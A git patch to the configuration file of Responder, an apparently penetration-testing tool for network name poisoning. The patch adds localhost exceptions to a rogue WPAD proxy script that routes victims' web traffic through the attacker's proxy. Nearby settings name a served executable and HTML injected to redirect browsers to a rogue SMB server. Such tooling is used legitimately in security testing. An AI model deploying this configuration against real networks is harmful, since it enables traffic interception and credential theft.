From 660b7079e72db6ce8ecb31da4f007a9e176f4d66 Mon Sep 17 00:00:00 2001 From: lgandx Date: Sun, 26 Jan 2014 23:01:50 -0500 Subject: [PATCH] Updated Pac script to use direct connection for localhosts. --- Responder.conf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Responder.conf b/Responder.conf index e628f08..0f486bb 100644 --- a/Responder.conf +++ b/Responder.conf @@ -38,7 +38,7 @@ Filename = Denied.html ExecFilename = FixInternet.exe ; ;Set your custom PAC script -WPADScript = function FindProxyForURL(url, host){if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT";return 'PROXY ISAProxySrv:3141; DIRECT';} +WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") ||(shExpMatch(host, "localhost.*")) ||(host == "127.0.0.1")) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT";return 'PROXY ISAProxySrv:3141; DIRECT';} ; ;HTML answer to inject. ;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.